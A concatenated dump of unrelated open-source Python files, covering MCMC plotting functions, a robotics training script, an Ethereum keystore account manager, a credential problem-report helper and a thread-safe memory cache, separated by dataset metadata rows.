    # locally inside other functions in this module, so this raised
    # NameError. Import it locally, matching the module's pattern.
    import matplotlib.pyplot as plt

    xmin = x.min()
    xmax = x.max()
    ymin = y.min()
    ymax = y.max()

    # An imaginary step makes np.mgrid interpret it as a point count.
    grid = grid * 1j
    X, Y = np.mgrid[xmin:xmax:grid, ymin:ymax:grid]

    positions = np.vstack([X.ravel(), Y.ravel()])
    values = np.vstack([x, y])
    kernel = kde.gaussian_kde(values)
    Z = np.reshape(kernel(positions).T, X.shape)

    ax.imshow(np.rot90(Z), cmap=plt.cm.gist_earth_r,
              extent=[xmin, xmax, ymin, ymax])
def kdeplot(data, ax=None):
    """One-dimensional KDE plot; creates a fresh axes when none is given.

    Parameters
    ----------
    data : 2-D array (columns are plotted independently)
    ax : matplotlib axes, optional

    Returns
    -------
    ax : matplotlib axes
    """
    if ax is None:
        # Fix: `subplots` was referenced unqualified but never imported at
        # module level, so this branch raised NameError. Use pyplot via a
        # local import, as the other plotting functions here do.
        import matplotlib.pyplot as plt
        f, ax = plt.subplots(1, 1, squeeze=True)
    kdeplot_op(ax, data)
    return ax
def kde2plot(x, y, grid=200, ax=None):
    """Two-dimensional KDE image plot; creates a fresh axes when none is given.

    Parameters
    ----------
    x, y : 1-D sample arrays of equal length
    grid : int
        Number of evaluation points per axis (default 200).
    ax : matplotlib axes, optional

    Returns
    -------
    ax : matplotlib axes
    """
    if ax is None:
        # Fix: `subplots` was an undefined name at module scope (NameError).
        import matplotlib.pyplot as plt
        f, ax = plt.subplots(1, 1, squeeze=True)
    kde2plot_op(ax, x, y, grid)
    return ax
def autocorrplot(trace, vars=None, max_lag=100, burn=0, ax=None,
                 symmetric_plot=False):
    """Bar plot of the autocorrelation function for a trace

    Parameters
    ----------
    trace : result of MCMC run
    vars : list of variable names
        Variables to be plotted, if None all variable are plotted.
        Vector-value stochastics are handled automatically.
    max_lag : int
        Maximum lag to calculate autocorrelation. Defaults to 100.
    burn : int
        Number of samples to discard from the beginning of the trace.
        Defaults to 0.
    ax : axes
        Matplotlib axes. Defaults to None.
    symmetric_plot : boolean
        Plot from either [0, +lag] or [-lag, lag]. Defaults to False, [-, +lag].

    Returns
    -------
    (fig, ax) : matplotlib figure and axes array
    """
    import matplotlib.pyplot as plt

    def _handle_array_varnames(val):
        # Expand a vector-valued variable into one pseudo-name per element
        # ('theta' of width 3 -> 'theta_0', 'theta_1', 'theta_2').
        if trace[0][val].__class__ is np.ndarray:
            k = trace[val].shape[1]
            # Fix: was `xrange`, a Python-2-only builtin (NameError on Py3).
            for i in range(k):
                yield val + '_{0}'.format(i)
        else:
            yield val

    if vars is None:
        vars = [item for sub in [[i for i in _handle_array_varnames(var)]
                                 for var in trace.varnames] for item in sub]
    else:
        vars = [str(var) for var in vars]
        vars = [item for sub in [[i for i in _handle_array_varnames(var)]
                                 for var in vars] for item in sub]

    chains = trace.nchains

    fig, ax = plt.subplots(len(vars), chains, squeeze=False,
                           sharex=True, sharey=True)

    max_lag = min(len(trace) - 1, max_lag)

    for i, v in enumerate(vars):
        for j in range(chains):
            try:
                d = np.squeeze(trace.get_values(v, chains=[j], burn=burn,
                                                combine=False))
            except KeyError:
                # Pseudo-name for one element of a vector variable:
                # recover the base name and the element index.
                k = int(v.split('_')[-1])
                v_use = '_'.join(v.split('_')[:-1])
                d = np.squeeze(trace.get_values(v_use, chains=[j], burn=burn,
                                                combine=False)[:, k])

            ax[i, j].acorr(d, detrend=plt.mlab.detrend_mean, maxlags=max_lag)

            if not j:
                ax[i, j].set_ylabel("correlation")
            if i == len(vars) - 1:
                ax[i, j].set_xlabel("lag")
            ax[i, j].set_title(v)

            if not symmetric_plot:
                ax[i, j].set_xlim(0, max_lag)

            if chains > 1:
                # Overrides the variable-name title with the chain number.
                ax[i, j].set_title("chain {0}".format(j+1))

    return (fig, ax)
def var_str(name, shape):
    """Return y-axis labels for the elements of a tallyable object.

    Only the first element's label carries the variable name (separated by a
    space); subsequent elements get bare 1-based index labels. This is a
    support function for forestplot. (The previous docstring example
    incorrectly showed every element prefixed with the name.)

    :Example:
        var_str('theta', (4,))
        ==> ['theta [1]', '[2]', '[3]', '[4]']
    """
    size = np.prod(shape)
    # 1-based multi-indices, one column per element, in C order.
    ind = (np.indices(shape) + 1).reshape(-1, size)
    names = ['[' + ','.join(map(str, i)) + ']' for i in zip(*ind)]
    # Prefix only the first label with the variable name.
    names[0] = '%s %s' % (name, names[0])
    return names
def forestplot(trace_obj, vars=None, alpha=0.05, quartiles=True, rhat=True,
               main=None, xtitle=None, xrange=None, ylabels=None,
               chain_spacing=0.05, vline=0, gs=None):
    """ Forest plot (model summary plot)

    Generates a "forest plot" of 100*(1-alpha)% credible intervals for either
    the set of variables in a given model, or a specified set of nodes.

    :Arguments:
        trace_obj: NpTrace or MultiTrace object
            Trace(s) from an MCMC sample.
        vars: list
            List of variables to plot (defaults to None, which results in all
            variables plotted).
        alpha (optional): float
            Alpha value for (1-alpha)*100% credible intervals (defaults to
            0.05).
        quartiles (optional): bool
            Flag for plotting the interquartile range, in addition to the
            (1-alpha)*100% intervals (defaults to True).
        rhat (optional): bool
            Flag for plotting Gelman-Rubin statistics. Requires 2 or more
            chains (defaults to True).
        main (optional): string
            Title for main plot. Passing False results in titles being
            suppressed; passing None (default) results in default titles.
        xtitle (optional): string
            Label for x-axis. Defaults to no label
        xrange (optional): list or tuple
            Range for x-axis. Defaults to matplotlib's best guess.
        ylabels (optional): list or array
            User-defined labels for each variable. If not provided, the node
            __name__ attributes are used.
        chain_spacing (optional): float
            Plot spacing between chains (defaults to 0.05).
        vline (optional): numeric
            Location of vertical reference line (defaults to 0).
        gs : GridSpec
            Matplotlib GridSpec object. Defaults to None.

    Returns
    -------

    gs : matplotlib GridSpec

    """
    import matplotlib.pyplot as plt
    from matplotlib import gridspec

    # Quantiles to be calculated
    qlist = [100 * alpha / 2, 50, 100 * (1 - alpha / 2)]
    if quartiles:
        qlist = [100 * alpha / 2, 25, 50, 75, 100 * (1 - alpha / 2)]

    # Range for x-axis
    plotrange = None

    # Number of chains
    # NOTE(review): `chains` is assigned here but never used below;
    # `nchains` is used instead.
    chains = None

    # Subplots
    interval_plot = None
    rhat_plot = None

    nchains = trace_obj.nchains
    if nchains > 1:
        from .diagnostics import gelman_rubin
        R = gelman_rubin(trace_obj)
        if vars is not None:
            R = {v: R[v] for v in vars}
    else:
        # Can't calculate Gelman-Rubin with a single trace
        rhat = False

    if vars is None:
        vars = trace_obj.varnames

    # Empty list for y-axis labels
    labels = []

    if gs is None:
        # Initialize plot
        if rhat and nchains > 1:
            gs = gridspec.GridSpec(1, 2, width_ratios=[3, 1])
        else:
            gs = gridspec.GridSpec(1, 1)

        # Subplot for confidence intervals
        interval_plot = plt.subplot(gs[0])

    trace_quantiles = quantiles(trace_obj, qlist, squeeze=False)
    hpd_intervals = hpd(trace_obj, alpha, squeeze=False)

    for j, chain in enumerate(trace_obj.chains):
        # Counter for current variable
        var = 1
        for varname in vars:
            var_quantiles = trace_quantiles[chain][varname]

            quants = [var_quantiles[v] for v in qlist]
            var_hpd = hpd_intervals[chain][varname].T

            # Substitute HPD interval for quantile
            quants[0] = var_hpd[0].T
            quants[-1] = var_hpd[1].T

            # Ensure x-axis contains range of current interval
            if plotrange:
                plotrange = [min(
                    plotrange[0],
                    np.min(quants)),
                    max(plotrange[1],
                        np.max(quants))]
            else:
                plotrange = [np.min(quants), np.max(quants)]

            # Number of elements in current variable
            value = trace_obj.get_values(varname, chains=[chain])[0]
            k = np.size(value)

            # Append variable name(s) to list (first chain only)
            if not j:
                if k > 1:
                    names = var_str(varname, np.shape(value))
                    labels += names
                else:
                    labels.append(varname)
                    # labels.append('\n'.join(varname.split('_')))

            # Add spacing for each chain, if more than one
            # NOTE(review): `e` does not depend on `varname`; it could be
            # hoisted out of this loop.
            e = [0] + [(chain_spacing * ((i + 2) / 2)) *
                       (-1) ** i for i in range(nchains - 1)]

            # Deal with multivariate nodes
            if k > 1:
                for i, q in enumerate(np.transpose(quants).squeeze()):
                    # Y coordinate with jitter
                    y = -(var + i) + e[j]

                    if quartiles:
                        # Plot median
                        plt.plot(q[2], y, 'bo', markersize=4)
                        # Plot quartile interval
                        plt.errorbar(
                            x=(q[1],
                                q[3]),
                            y=(y,
                                y),
                            linewidth=2,
                            color='b')
                    else:
                        # Plot median
                        plt.plot(q[1], y, 'bo', markersize=4)

                    # Plot outer interval
                    plt.errorbar(
                        x=(q[0],
                            q[-1]),
                        y=(y,
                            y),
                        linewidth=1,
                        color='b')
            else:
                # Y coordinate with jitter
                y = -var + e[j]

                if quartiles:
                    # Plot median
                    plt.plot(quants[2], y, 'bo', markersize=4)
                    # Plot quartile interval
                    plt.errorbar(
                        x=(quants[1],
                            quants[3]),
                        y=(y,
                            y),
                        linewidth=2,
                        color='b')
                else:
                    # Plot median
                    plt.plot(quants[1], y, 'bo', markersize=4)

                # Plot outer interval
                plt.errorbar(
                    x=(quants[0],
                        quants[-1]),
                    y=(y,
                        y),
                    linewidth=1,
                    color='b')

            # Increment index
            var += k

    labels = ylabels if ylabels is not None else labels

    # Update margins
    left_margin = np.max([len(x) for x in labels]) * 0.015
    gs.update(left=left_margin, right=0.95, top=0.9, bottom=0.05)

    # Define range of y-axis
    # NOTE(review): relies on `var` leaking from the loop above.
    plt.ylim(-var + 0.5, -0.5)

    datarange = plotrange[1] - plotrange[0]
    plt.xlim(plotrange[0] - 0.05 * datarange, plotrange[1] + 0.05 * datarange)

    # Add variable labels
    plt.yticks([-(l + 1) for l in range(len(labels))], labels)

    # Add title
    if main is not False:
        plot_title = main or str(int((
            1 - alpha) * 100)) + "% Credible Intervals"
        plt.title(plot_title)

    # Add x-axis label
    if xtitle is not None:
        plt.xlabel(xtitle)

    # Constrain to specified range
    if xrange is not None:
        plt.xlim(*xrange)

    # Remove ticklines on y-axes
    # NOTE(review): `interval_plot` is None when a caller supplies `gs`,
    # which would raise AttributeError here — confirm callers always pass
    # gs=None.
    for ticks in interval_plot.yaxis.get_major_ticks():
        ticks.tick1On = False
        ticks.tick2On = False

    for loc, spine in interval_plot.spines.items():
        if loc in ['bottom', 'top']:
            pass
            # spine.set_position(('outward',10)) # outward by 10 points
        elif loc in ['left', 'right']:
            spine.set_color('none')  # don't draw spine

    # Reference line
    plt.axvline(vline, color='k', linestyle='--')

    # Genenerate Gelman-Rubin plot
    if rhat and nchains > 1:
        # If there are multiple chains, calculate R-hat
        rhat_plot = plt.subplot(gs[1])

        if main is not False:
            plt.title("R-hat")

        # Set x range
        plt.xlim(0.9, 2.1)

        # X axis labels
        plt.xticks((1.0, 1.5, 2.0), ("1", "1.5", "2+"))
        plt.yticks([-(l + 1) for l in range(len(labels))], "")

        i = 1
        for varname in vars:
            chain = trace_obj.chains[0]
            value = trace_obj.get_values(varname, chains=[chain])[0]
            k = np.size(value)

            # R-hat values are clipped at 2 for display.
            if k > 1:
                plt.plot([min(r, 2) for r in R[varname]], [-(j + i)
                         for j in range(k)], 'bo', markersize=4)
            else:
                plt.plot(min(R[varname], 2), -i, 'bo', markersize=4)

            i += k

        # Define range of y-axis
        plt.ylim(-i + 0.5, -0.5)

        # Remove ticklines on y-axes
        for ticks in rhat_plot.yaxis.get_major_ticks():
            ticks.tick1On = False
            ticks.tick2On = False

        for loc, spine in rhat_plot.spines.items():
            if loc in ['bottom', 'top']:
                pass
                # spine.set_position(('outward',10)) # outward by 10 points
            elif loc in ['left', 'right']:
                spine.set_color('none')  # don't draw spine

    return gs
| 30.361011 | 89 | 0.511356 |
2b9d467dde816dbe452a3aba4c8c3119aea4b50f | 2,790 | py | Python | deprecated_examples/robotics/unimodal_image-pred.py | TianhaoFu/MultiBench | b174a3187124d6f92be1ff3b487eef292f7883bb | [
"MIT"
] | null | null | null | deprecated_examples/robotics/unimodal_image-pred.py | TianhaoFu/MultiBench | b174a3187124d6f92be1ff3b487eef292f7883bb | [
"MIT"
] | null | null | null | deprecated_examples/robotics/unimodal_image-pred.py | TianhaoFu/MultiBench | b174a3187124d6f92be1ff3b487eef292f7883bb | [
"MIT"
] | null | null | null | import sys
import os
sys.path.insert(0, os.getcwd())
import time
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import yaml
import os
from tqdm import tqdm
from fusions.robotics.sensor_fusion import SensorFusionSelfSupervised,roboticsConcat
from unimodals.robotics.encoders import (
ProprioEncoder, ForceEncoder, ImageEncoder, DepthEncoder, ActionEncoder,
)
from unimodals.common_models import MLP
from unimodals.robotics.decoders import ContactDecoder
from training_structures.Simple_Late_Fusion import train, test
from robotics_utils import set_seeds
from datasets.robotics.data_loader import get_data
from torch.utils.data import DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
from torchvision import transforms
class selfsupervised:
    """Unimodal (image-only) end-effector pose regression on MultiBench robotics data.

    Wires up the image/depth/action encoders, an image-only concat fusion and an
    MLP head, then delegates optimization to ``Simple_Late_Fusion.train``.
    """

    def __init__(self, configs):
        """
        Args:
            configs: dict-like training configuration; must provide the keys
                'seed', 'zdim', 'vision', 'depth', 'action_dim' and 'lr'.
        """
        # ------------------------
        # Sets seed and cuda
        # ------------------------
        use_cuda = True

        self.configs = configs
        self.device = torch.device("cuda" if use_cuda else "cpu")

        set_seeds(configs["seed"], use_cuda)

        self.encoders = [
            ImageEncoder(configs['zdim'], alpha=configs['vision']),
            DepthEncoder(configs['zdim'], alpha=configs['depth']),
            ActionEncoder(configs['action_dim']),
        ]
        # Only the image modality is fused, hence roboticsConcat("image").
        self.fusion = roboticsConcat("image")
        self.head = MLP(544, 128, 4)

        self.optimtype = optim.Adam

        # losses
        self.loss_contact_next = nn.BCEWithLogitsLoss()

        self.train_loader, self.val_loader = get_data(
            self.device, self.configs,
            "/home/pliang/multibench/MultiBench-robotics/",
            unimodal='image', output='ee_yaw_next')

    @staticmethod
    def _dump_dataset_paths(loader, filename):
        """Write one dataset path per line to *filename* (debug/reproducibility aid)."""
        with open(filename, 'w') as f:
            for path in loader.dataset.dataset_path:
                f.write(f'{path}\n')

    def train(self):
        """Log dataset sizes/paths and run regression training for 15 epochs."""
        print(len(self.train_loader.dataset), len(self.val_loader.dataset))
        self._dump_dataset_paths(self.train_loader, 'train_dataset.txt')
        self._dump_dataset_paths(self.val_loader, 'val_dataset.txt')

        train(self.encoders, self.fusion, self.head,
              self.train_loader, self.val_loader,
              15, task='regression',
              optimtype=self.optimtype,
              lr=self.configs['lr'], criterion=torch.nn.MSELoss())
if __name__ == "__main__":
    # safe_load: yaml.load without an explicit Loader is unsafe and rejected
    # by modern PyYAML; the config is plain data, so safe_load suffices.
    with open('examples/robotics/training_default.yaml') as f:
        configs = yaml.safe_load(f)

    selfsupervised(configs).train()
| 33.214286 | 165 | 0.657706 |
bf2d252c74ebd044b76fe504e27414cec7d79fa3 | 9,228 | py | Python | raiden/accounts.py | destenson/raiden-network--raiden | 845b3d9d8440e4f12b82854194fd6c9e1500b991 | [
"MIT"
] | null | null | null | raiden/accounts.py | destenson/raiden-network--raiden | 845b3d9d8440e4f12b82854194fd6c9e1500b991 | [
"MIT"
] | null | null | null | raiden/accounts.py | destenson/raiden-network--raiden | 845b3d9d8440e4f12b82854194fd6c9e1500b991 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import getpass
import json
import os
import sys
from binascii import hexlify, unhexlify
from bitcoin import privtopub
from ethereum.tools import keys
from ethereum.slogging import get_logger
log = get_logger(__name__)
def find_datadir():
    """Return the platform-specific Ethereum data directory, or None if absent."""
    home = os.path.expanduser('~')
    if home == '~':
        # expanduser failed, so there is no home directory to search under
        return None

    if sys.platform == 'darwin':
        parts = ('Library', 'Ethereum')
    # NOTE: Not really sure about cygwin here
    elif sys.platform in ('win32', 'cygwin'):
        parts = ('AppData', 'Roaming', 'Ethereum')
    elif os.name == 'posix':
        parts = ('.ethereum',)
    else:
        raise RuntimeError('Unsupported Operating System')

    datadir = os.path.join(home, *parts)
    return datadir if os.path.isdir(datadir) else None
def find_keystoredir():
    """Return the 'keystore' directory inside the data dir, or None if not found."""
    datadir = find_datadir()
    if datadir is None:
        # can't find a data directory in the system
        return None

    keystore_path = os.path.join(datadir, 'keystore')
    return keystore_path if os.path.exists(keystore_path) else None
class AccountManager:
    """Index of the accounts found in a keystore directory.

    Maps lowercase hex addresses to the path of their keystore file.
    """

    def __init__(self, keystore_path=None):
        """Scan *keystore_path* (or the default keystore location) for key files.

        Args:
            keystore_path: directory containing keystore files; if `None` the
                default location returned by ``find_keystoredir()`` is used.
        """
        self.keystore_path = keystore_path
        # mapping: lowercase hex address (no '0x') -> keystore file path
        self.accounts = {}
        if self.keystore_path is None:
            self.keystore_path = find_keystoredir()
        if self.keystore_path is not None:
            for f in os.listdir(self.keystore_path):
                fullpath = os.path.join(self.keystore_path, f)
                if os.path.isfile(fullpath):
                    try:
                        with open(fullpath) as data_file:
                            data = json.load(data_file)
                            self.accounts[str(data['address']).lower()] = str(fullpath)
                    except (ValueError, KeyError, IOError) as ex:
                        # Invalid file - skip
                        if f.startswith('UTC--'):
                            # Should be a valid account file - warn user
                            msg = 'Invalid account file'
                            if isinstance(ex, IOError):
                                msg = 'Can not read account file'
                            log.warning('%s %s: %s', msg, fullpath, ex)

    def address_in_keystore(self, address):
        """Return True if *address* (hex, optionally '0x'-prefixed) was indexed."""
        if address is None:
            return False

        if address.startswith('0x'):
            address = address[2:]

        return address.lower() in self.accounts

    def get_privkey(self, address, password=None):
        """Find the keystore file for an account, unlock it and get the private key

        Args:
            address(str): The Ethereum address for which to find the keyfile in the system
            password(str): Mostly for testing purposes. A password can be provided
                           as the function argument here. If it's not then the
                           user is interactively queried for one.
        Returns
            str: The private key associated with the address
        """

        if address.startswith('0x'):
            address = address[2:]

        address = address.lower()

        if not self.address_in_keystore(address):
            raise ValueError('Keystore file not found for %s' % address)

        with open(self.accounts[address]) as data_file:
            data = json.load(data_file)

        # Since file was found prompt for a password if not already given
        if password is None:
            password = getpass.getpass('Enter the password to unlock %s: ' % address)
        acc = Account(data, password, self.accounts[address])
        return acc.privkey
class Account:
    """Represents an account. """

    def __init__(self, keystore, password=None, path=None):
        """
        Args:
            keystore: the key store as a dictionary (as decoded from json)
            password: password to unlock the account immediately, or `None`
                to leave it locked
            path: absolute path to the associated keystore file (`None` for
                in-memory accounts)
        """
        if path is not None:
            path = os.path.abspath(path)

        self.keystore = keystore
        self.locked = True
        self.path = path
        self._privkey = None
        self._address = None

        try:
            self._address = unhexlify(self.keystore['address'])
        except KeyError:
            # address not stored in the keystore; it can still be derived
            # from the private key once the account is unlocked
            pass

        if password is not None:
            self.unlock(password)

    @classmethod
    def load(cls, path, password=None):
        """Load an account from a keystore file.

        Args:
            path: full path to the keyfile
            password: the password to decrypt the key file or `None` to leave it encrypted
        """
        with open(path) as f:
            keystore = json.load(f)
        if not keys.check_keystore_json(keystore):
            raise ValueError('Invalid keystore file')
        return Account(keystore, password, path=path)

    def dump(self, include_address=True, include_id=True):
        """Dump the keystore for later disk storage.

        The result inherits the entries `'crypto'` and `'version`' from `account.keystore`, and
        adds `'address'` and `'id'` in accordance with the parameters `'include_address'` and
        `'include_id`'.

        If address or id are not known, they are not added, even if requested.

        Args:
            include_address: flag denoting if the address should be included or not
            include_id: flag denoting if the id should be included or not
        """
        d = {
            'crypto': self.keystore['crypto'],
            'version': self.keystore['version']
        }
        if include_address and self.address is not None:
            # hexlify() returns bytes on Python 3, which json.dumps cannot
            # serialize; decode to a plain hex string first
            d['address'] = hexlify(self.address).decode('ascii')
        if include_id and self.uuid is not None:
            d['id'] = self.uuid
        return json.dumps(d)

    def unlock(self, password):
        """Unlock the account with a password.

        If the account is already unlocked, nothing happens, even if the password is wrong.

        Raises:
            ValueError: (originating in ethereum.keys) if the password is wrong
            (and the account is locked)
        """
        if self.locked:
            self._privkey = keys.decode_keystore_json(self.keystore, password)
            self.locked = False
            self.address  # get address such that it stays accessible after a subsequent lock

    def lock(self):
        """Relock an unlocked account.

        This method sets `account.privkey` to `None` (unlike `account.address` which is preserved).
        After calling this method, both `account.privkey` and `account.pubkey` are `None.
        `account.address` stays unchanged, even if it has been derived from the private key.
        """
        self._privkey = None
        self.locked = True

    @property
    def privkey(self):
        """The account's private key or `None` if the account is locked"""
        if not self.locked:
            return self._privkey
        return None

    @property
    def pubkey(self):
        """The account's public key or `None` if the account is locked"""
        if not self.locked:
            return privtopub(self.privkey)
        return None

    @property
    def address(self):
        """The account's address or `None` if the address is not stored in the key file and cannot
        be reconstructed (because the account is locked)
        """
        if self._address:
            pass
        elif 'address' in self.keystore:
            self._address = unhexlify(self.keystore['address'])
        elif not self.locked:
            self._address = keys.privtoaddr(self.privkey)
        else:
            return None

        return self._address

    @property
    def uuid(self):
        """An optional unique identifier, formatted according to UUID version 4, or `None` if the
        account does not have an id
        """
        try:
            return self.keystore['id']
        except KeyError:
            return None

    @uuid.setter
    def uuid(self, value):
        """Set the UUID. Set it to `None` in order to remove it."""
        if value is not None:
            self.keystore['id'] = value
        elif 'id' in self.keystore:
            self.keystore.pop('id')

    def sign_tx(self, tx):
        """Sign a Transaction with the private key of this account.

        If the account is unlocked, this is equivalent to ``tx.sign(account.privkey)``.

        Args:
            tx: the :class:`ethereum.transactions.Transaction` to sign

        Raises:
            ValueError: if the account is locked
        """
        if self.privkey:
            log.info('signing tx', tx=tx, account=self)
            tx.sign(self.privkey)
        else:
            raise ValueError('Locked account cannot sign tx')

    def __repr__(self):
        if self.address is not None:
            # decode so the repr shows plain hex instead of a bytes literal
            address = hexlify(self.address).decode('ascii')
        else:
            address = '?'
        return '<Account(address={address}, id={id})>'.format(address=address, id=self.uuid)
| 34.304833 | 99 | 0.588535 |
c17773c596f7dc3bc80a29eadbdc94b663cd43ef | 1,691 | py | Python | aries_cloudagent/protocols/issue_credential/v1_0/__init__.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 247 | 2019-07-02T21:10:21.000Z | 2022-03-30T13:55:33.000Z | aries_cloudagent/protocols/issue_credential/v1_0/__init__.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 1,462 | 2019-07-02T20:57:30.000Z | 2022-03-31T23:13:35.000Z | aries_cloudagent/protocols/issue_credential/v1_0/__init__.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 377 | 2019-06-20T21:01:31.000Z | 2022-03-30T08:27:53.000Z | from typing import Coroutine, Union
from ....connections.models.conn_record import ConnRecord
from ....core.error import BaseError
from .messages.credential_problem_report import (
CredentialProblemReport,
ProblemReportReason,
)
from .models.credential_exchange import V10CredentialExchange
def problem_report_for_record(
    record: Union[ConnRecord, V10CredentialExchange],
    desc_en: str,
) -> CredentialProblemReport:
    """
    Build a credential problem report, citing the record's thread when available.

    Args:
        record: connection or exchange record (may be falsy)
        desc_en: English description text to include in the report
    """
    report = CredentialProblemReport(
        description={
            "en": desc_en,
            "code": ProblemReportReason.ISSUANCE_ABANDONED.value,
        },
    )

    thread_id = getattr(record, "thread_id", None) if record else None
    if thread_id:
        report.assign_thread_id(thread_id)

    return report
async def report_problem(
    err: BaseError,
    desc_en: str,
    http_error_class,
    record: Union[ConnRecord, V10CredentialExchange],
    outbound_handler: Coroutine,
):
    """
    Send a problem report for the record, then raise the matching HTTP error.

    Args:
        err: error for internal diagnostics
        desc_en: English description text for the problem report (response)
        http_error_class: HTTP error class to raise
        record: record whose thread/connection the problem report cites
        outbound_handler: coroutine used to send the outbound message
    """
    if record:
        report = problem_report_for_record(record, desc_en)
        await outbound_handler(report, connection_id=record.connection_id)

    raise http_error_class(reason=err.roll_up) from err
| 26.421875 | 73 | 0.686576 |
df01734fab45f8b666075df224553691cc2f52d4 | 3,309 | py | Python | bauh/view/util/cache.py | leoneii/bauh | ceef6c30851552ec37e21ef6335a4cbdd126622f | [
"Zlib"
] | 1 | 2020-06-16T17:08:32.000Z | 2020-06-16T17:08:32.000Z | bauh/view/util/cache.py | octopusSD/bauh | c1f210fef87ddb4614b201ec2030330b71e43fe4 | [
"Zlib"
] | null | null | null | bauh/view/util/cache.py | octopusSD/bauh | c1f210fef87ddb4614b201ec2030330b71e43fe4 | [
"Zlib"
] | null | null | null | import datetime
import time
from threading import Lock, Thread
from bauh.api.abstract.cache import MemoryCache, MemoryCacheFactory
class DefaultMemoryCache(MemoryCache):
    """
    A synchronized cache implementation
    """

    def __init__(self, expiration_time: int):
        """
        :param expiration_time: entry lifetime in seconds. 0 disables the cache
        entirely; a negative value means entries never expire.
        """
        super(DefaultMemoryCache, self).__init__()
        self.expiration_time = expiration_time
        self._cache = {}
        self.lock = Lock()

    def is_enabled(self) -> bool:
        # only an expiration time of exactly 0 disables the cache
        return self.expiration_time != 0

    def _expiration_for_new_entry(self):
        """Return the absolute expiry timestamp, or None for 'never expires'."""
        if self.expiration_time <= 0:
            return None
        return datetime.datetime.utcnow() + datetime.timedelta(seconds=self.expiration_time)

    def add(self, key: str, val: object):
        """Store *val* under *key*, replacing any existing entry."""
        if key and self.is_enabled():
            with self.lock:
                self._add(key, val)

    def _add(self, key: str, val: object):
        # caller must hold self.lock
        if key:
            self._cache[key] = {'val': val, 'expires_at': self._expiration_for_new_entry()}

    def add_non_existing(self, key: str, val: object):
        """Store *val* under *key* only if there is no live entry for it yet."""
        if key and self.is_enabled():
            with self.lock:
                if self.get(key, lock=False) is None:
                    self._add(key, val)

    def get(self, key: str, lock: bool = True):
        """Return the cached value for *key*, or None if absent or expired.

        Expired entries are evicted on access. ``lock=False`` must only be
        used by callers that already hold ``self.lock``.
        """
        if not (key and self.is_enabled()):
            return None

        entry = self._cache.get(key)
        if not entry:
            return None

        expires_at = entry.get('expires_at')
        if expires_at and expires_at <= datetime.datetime.utcnow():
            # pop() with a default tolerates a concurrent removal of the key
            # (the old check-then-del could raise KeyError under races)
            if lock:
                with self.lock:
                    self._cache.pop(key, None)
            else:
                self._cache.pop(key, None)
            return None

        return entry['val']

    def delete(self, key):
        """Remove *key* if present (no-op otherwise)."""
        if key and self.is_enabled():
            # acquire the lock before checking membership: the previous
            # check-then-delete sequence could raise KeyError if another
            # thread removed the key in between
            with self.lock:
                self._cache.pop(key, None)

    def keys(self):
        """Return a snapshot set of the current cache keys."""
        return set(self._cache.keys()) if self.is_enabled() else set()

    def clean_expired(self):
        """Evict all expired entries (get() drops stale entries on access)."""
        if self.is_enabled():
            for key in self.keys():
                self.get(key)
class CacheCleaner(Thread):
    """Daemon thread that periodically evicts expired entries from registered caches."""

    def __init__(self, check_interval: int = 15):
        """
        :param check_interval: seconds to sleep between cleaning passes
        """
        super(CacheCleaner, self).__init__(daemon=True)
        self.caches = []
        self.check_interval = check_interval

    def register(self, cache: MemoryCache):
        """Track *cache* for periodic cleaning (disabled caches are ignored)."""
        if cache.is_enabled():
            self.caches.append(cache)

    def run(self):
        # Loop unconditionally: the previous implementation returned at once
        # when no cache was registered before start(), so caches registered
        # afterwards were never cleaned.
        while True:
            # iterate over a snapshot so register() can run concurrently
            for cache in list(self.caches):
                cache.clean_expired()

            time.sleep(self.check_interval)
class DefaultMemoryCacheFactory(MemoryCacheFactory):
    """Factory producing DefaultMemoryCache instances registered with a cleaner."""

    def __init__(self, expiration_time: int, cleaner: CacheCleaner):
        """
        :param expiration_time: default expiration time for all instantiated caches
        :param cleaner: cleaner thread that every new cache is registered with
        """
        super(DefaultMemoryCacheFactory, self).__init__()
        self.expiration_time = expiration_time
        self.cleaner = cleaner

    def new(self, expiration: int = None) -> MemoryCache:
        """Create a cache, register it with the cleaner and return it."""
        effective_expiration = self.expiration_time if expiration is None else expiration
        cache = DefaultMemoryCache(effective_expiration)
        self.cleaner.register(cache)
        return cache
| 29.283186 | 174 | 0.585675 |
4daae76531c62d58bc17b885ed6070b1093bf2ab | 689 | py | Python | atomisticparsers/namd/__init__.py | nomad-coe/atomistic-parsers | 7be55968fbf45e8e49377b58e745548c55c06788 | [
"Apache-2.0"
] | null | null | null | atomisticparsers/namd/__init__.py | nomad-coe/atomistic-parsers | 7be55968fbf45e8e49377b58e745548c55c06788 | [
"Apache-2.0"
] | null | null | null | atomisticparsers/namd/__init__.py | nomad-coe/atomistic-parsers | 7be55968fbf45e8e49377b58e745548c55c06788 | [
"Apache-2.0"
] | null | null | null | #
# Copyright The NOMAD Authors.
#
# This file is part of NOMAD.
# See https://nomad-lab.eu for further info.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .parser import NAMDParser
| 34.45 | 74 | 0.753266 |
a23341b4de3450dedbb7337b358d743e891ca2bc | 797 | py | Python | eagent/config.py | r-koike/eagent | b01f413ed90752fd1bbc4c6a59edf1c9020e11b8 | [
"MIT"
] | null | null | null | eagent/config.py | r-koike/eagent | b01f413ed90752fd1bbc4c6a59edf1c9020e11b8 | [
"MIT"
] | null | null | null | eagent/config.py | r-koike/eagent | b01f413ed90752fd1bbc4c6a59edf1c9020e11b8 | [
"MIT"
] | null | null | null | import json
import os
import glob
import copy
# mapping: config file basename -> merged configuration dict
cfg_dict = {}

cfg_dirnames = [
    os.path.join("eagent", "configs", "ewalker"),
    os.path.join("eagent", "configs", "ehand_egg"),
]
default_filename = "default.json"


def _load_cfg_dir(cfg_dirname):
